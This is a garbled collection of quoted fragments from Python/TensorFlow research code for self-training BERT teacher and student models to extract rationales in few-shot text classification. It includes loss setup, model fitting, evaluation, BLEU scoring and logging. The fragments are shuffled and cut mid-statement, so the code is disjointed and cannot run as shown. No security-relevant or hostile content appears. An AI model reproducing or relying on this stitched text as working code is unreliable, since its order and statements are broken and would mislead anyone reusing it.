{\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:]", "dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")],", "{} {}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape:", "0.0, 0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0]", "[],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j] == 1:", "X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101", "tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r'] = X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] model.fit(x=X_batch, y=[y_batch[:,0],", "1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0, 0.0, 0.0, 0.0] elif", "confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': 
X_unlabeled[\"input_ids\"][indices],", "\"attention_mask_r\":X[\"attention_mask_r\"][train_size:], \"input_ids_neg\":X[\"input_ids_neg\"][train_size:], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][train_size:], \"attention_mask_neg\":X[\"attention_mask_neg\"][train_size:]}, y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\":", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "= model.predict(X_test) class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1)", "to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. max_test_acc = 0. max_task_acc =", "if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]},", "'joint' in type_: _placeholder_labels = np.empty((y_train.shape[0], y_train.shape[0])) model.fit(x=X_train, y=[y_train[:,0], y_train, y_train[:,0], np.ones(len(y_train))], shuffle=True,", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_joint(TFModel, Config,", "val_loss)) if val_loss[0] < best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model =", "X_conf[:,0] = np.where(log_probs>0, log_probs, 0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0)", "= [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier':", "\"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, 
y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:],", "0.01*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus))", "np.argmax(y_pred, axis=-1) acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc", "acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf", "acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2]", "X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size],", "\"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size], \"input_ids_neg\":X[\"input_ids_neg\"][:train_size], \"token_type_ids_neg\":X[\"token_type_ids_neg\"][:train_size], \"attention_mask_neg\":X[\"attention_mask_neg\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:],", "< best_validation_loss: best_base_model = model best_validation_loss = val_loss[0] model = best_base_model ''' if", "model.predict(X_test)[1] class_acc = np.argmax(class_acc, 
axis=-1) elif 'joint' in type_: out = model.predict(X_test) class_acc,", "import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if", "max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp'", "batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),", "== 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best =", "0, 0, 0 pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0 for", "if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to {}\".format(model_file)) best_val_acc = 0.", "max_best_acc = 0. val_loss = 0. 
if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc", "logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "{}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision: {}\".format(p)) logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2,", "{}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred = model.predict(X_unlabeled, batch_size=256) #y_val", "r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1)", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in type_: logger.info(\"Training for without", "logger.info (\"Model file saved to {}\".format(model_file)) model_student = model model_student.load_weights(model_file_best) if 'mtl' in", "from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in", "indx = indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} : {}\".format(i, len(indx)))", "shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)])", "truth.append(' '.join(temp_t)) for word in temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else:", "y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), 
batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc',", "0.0, 0.0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5,", "= 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]],", "loss_weights = [1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0,", "cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in", "N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None, type_=\"token\", X_dev=None, y_dev=None, task=None): #labels =", "= np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices],", "truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as", "= acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices],", "logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc", "in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2]", "(student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of 
rationales on test set (student model):", "import numpy as np import os, sys import json import nltk import tensorflow", "= max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X,", "1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: #to skip evaluation of the task label", "if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc", "reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss =", "test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch, sample_scheme)) if os.path.exists(model_file):", "uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\":", "None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights", "{}\".format(X_dev[\"input_ids\"].shape, y_dev.shape)) logger.info(\"X Test Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape))", "= model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] ''' if val_loss < best_loss: best_loss", "r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): 
{}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in", "= {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for i", "def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce =", "data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None #", "X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} elif 'joint' in type_: acc", "= 0. val_loss = 0. 
if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc =", "= task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test, [y_test[:,0],", "'_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier':", "y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:],", "model = best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation acc for", "= 0, 0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct =", "performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1,", "return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "file saved to {}\".format(model_file)) best_val_acc = 0. best_test_acc = 0. 
max_test_acc = 0.", "class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score (macro/task):", "X_unlabeled, model_dir, tokenizer, sup_batch_size=4, unsup_batch_size=32, unsup_size=4096, sample_size=16384, TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1,", "y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc =", "\"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:], \"input_ids_r\":X[\"input_ids_r\"][train_size:], \"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:],", "= [1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights = [1.0, 1.0,", "type_: logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) '''", "y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss =", ": {}\".format(counter, test_acc)) logger.info (\"Best Test task acc for run {} with total", "X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\":", "validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss =", "y_test[:,0], np.ones(len(y_test))]) 
task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token acc", "X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i for", "score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1", "in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn += (y_test[i].sum()-ct) p =", "in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg", "task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if", "text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = ' '.join(text) temp['truth'] = truth[i]", "def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1)", "(\"Test token acc for run {} : {}\".format(counter, test_acc)) logger.info (\"Best Test task", "else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample", "test_pred = y_pred #np.argmax(y_pred, axis=-1) logger.info(\"Printing prediction data on student model for run", "X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train Shape: {} {}\".format(X_train[\"input_ids\"].shape, y_train.shape))", "p = tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token", "#original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss = None if 'focal'", "type_: out = model_student.predict(X_test) acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits:", "'_noexp' in type_: 
loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in type_:", "= strategy.num_replicas_in_sync logger.info('Number of devices: {}'.format(gpus)) #run the base model n times with", "(\"Val acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc:", "axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:] #", "X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices], \"attention_mask_r\": X_sample['attention_mask'][indices]} if '_neg' in type_: X_neg_rationale_batch", "y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss =", "= np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf = f_(tokenizer,", "'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of", "np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) logger.info(\"Best task acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro')))", "== 1: temp_p.append(temp[j]) if y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1", "max_task_acc = 0. max_best_acc = 0. val_loss = 0. 
if 'mtl' in type_:", "X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_: rat_loss", "for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = '", "acc score: {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) logger.info(\"Best token acc score: {}\".format(precision_recall_fscore_support(y_pred, y_test[:,1:], average='macro'))) pred,", "rationale from teacher model as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T =", "y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred,", "\"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:])", "\"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\":", "np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred = y_pred[:,1:]", "= tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal' in type_:", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val", "test set (student model): {} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])):", "np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\":", 
"import f1_score from sklearn.metrics import precision_recall_fscore_support logger = logging.getLogger('STRationale') def create_learning_rate_scheduler(max_learn_rate=5e-5, end_learn_rate=1e-7, warmup_epoch_count=10,", "len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier':tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': None},", "[y_test[:,0], y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test", "{}\".format(epoch)) if type_ == 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc =", "= [] for i in labels: indx = np.where(y_batch[:,0]==i)[0] GLOBAL_SEED = int(os.getenv(\"PYTHONHASHSEED\")) random.Random(GLOBAL_SEED).shuffle(indx)", "y_var, y_T = None, None, None if 'mtl' in type_: acc, y_pred =", "verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y, X_test, y_test, X_unlabeled, model_dir, tokenizer, sup_batch_size=4,", "y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) y_dev_plg = [y_dev[:,1:],", "out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc", "\"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file): model.load_weights(model_file) #model_task.load_weights(model_file_task) best_base_model = model logger.info", "SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights", "validation_data=(X_dev, [y_dev[:,0], 
y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:],", "y_batch, y_batch[:, 0], np.ones(len(y_batch))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc',", "test_acc)) logger.info (\"Best Test task acc for run {} with total loss :", "This code base is adapted from UST (https://github.com/microsoft/UST) \"\"\" from collections import defaultdict", "Code for Self-training for Rationale using few-shot learning. This code base is adapted", "1)) logger.info(\"BLEU-1 score of rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2", "model as input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input", "truth_0 = 0, 0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct", "model_student = model model_student.load_weights(model_file_best) if 'mtl' in type_: acc, y_pred = model_student.predict(X_test) y_pred", "logger.info (\"Best Test task acc for run {} with total loss : {}\".format(counter,", "y_test, y_test[:,0], np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token", "all the unlabeled examples\") X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]} if", "np.argmax(acc, axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out", "pred_0, truth_1, truth_0 = 0, 0, 0, 0 for i in range(len(test_pred)): temp_p,", 
"= acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = []", "None best_validation_loss = np.inf for counter in range(N_base): #original N_base=10 with strategy.scope(): if", "(teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4 score of rationales on test set (teacher model):", "type_: logger.info(\"Training for without rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True,", "in type_: loss_weights = [1.0, 0.0] else: loss_weights = [0.5, 0.5] with strategy.scope():", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_teacher_'+type_+'.json'), 'w') as f: json.dump(data, f) model_student = None", "[1.0, 0, 0, 0] if '_no_suffcomp' in type_: loss_weights = [1.0, 1.0, 0,", "{}\".format(model_file)) break elif 'mtl' in type_ : logger.info(y_train.shape) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=sup_epochs,", "axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in", "TFModel=TFBertModel, Config=BertConfig, pt_teacher_checkpoint='bert-base-uncased', sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3,", "epoch in range(unsup_epochs): logger.info (\"Starting loop {}\".format(epoch)) if type_ == 'mtl': test_acc =", "None, 'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss", "= truth[i] temp['pred'] = 
